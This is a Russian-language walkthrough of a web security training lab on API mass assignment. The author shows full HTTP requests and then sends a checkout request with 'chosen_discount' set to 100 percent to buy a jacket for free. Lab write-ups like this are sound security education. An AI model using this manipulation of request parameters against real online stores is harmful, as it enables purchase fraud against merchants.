Для прохождения лабы нужно найти эндпоинт с помощью атаки на API, который позволит купить Lightweight l33t Leather Jacket. Для входа в аккаунт можно использовать креды wiener:peter.
https://0a46003b0383e82c8002f36a00d800fc.web-security-academy.net/
Solution
Зайду в личный кабинет. Затем добавлю нужный товар в корзину:
POST /cart HTTP/2
Host: 0a46003b0383e82c8002f36a00d800fc.web-security-academy.net
Cookie: session=nWRkAcVdJbEPb97h2aoNUy3qJKglGX8O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a46003b0383e82c8002f36a00d800fc.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: https://0a46003b0383e82c8002f36a00d800fc.web-security-academy.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
productId=1&redir=PRODUCT&quantity=1
Простой запрос. Попробую оформить заказ:
POST /cart HTTP/2
Host: 0a46003b0383e82c8002f36a00d800fc.web-security-academy.net
Cookie: session=nWRkAcVdJbEPb97h2aoNUy3qJKglGX8O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a46003b0383e82c8002f36a00d800fc.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: https://0a46003b0383e82c8002f36a00d800fc.web-security-academy.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
productId=1&redir=PRODUCT&quantity=
Ответ:
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 153
{"chosen_discount":{"percentage":0},"chosen_products":[{"product_id":"1","name":"Lightweight \"l33t\" Leather Jacket","quantity":2,"item_price":133700}]}
Такс, вижу интересный параметр: "chosen_discount":{"percentage":0}. А что, если поменять при оформлении заказа?
POST /api/checkout HTTP/2
Host: 0a46003b0383e82c8002f36a00d800fc.web-security-academy.net
Cookie: session=nWRkAcVdJbEPb97h2aoNUy3qJKglGX8O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a46003b0383e82c8002f36a00d800fc.web-security-academy.net/cart
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers
Content-Type: application/json; charset=utf-8
Content-Length: 155
{"chosen_discount":{"percentage":100},"chosen_products":[{"product_id":"1","name":"Lightweight \"l33t\" Leather Jacket","quantity":2,"item_price":133700}]}
Заказ оформлен с отличной скидкой)
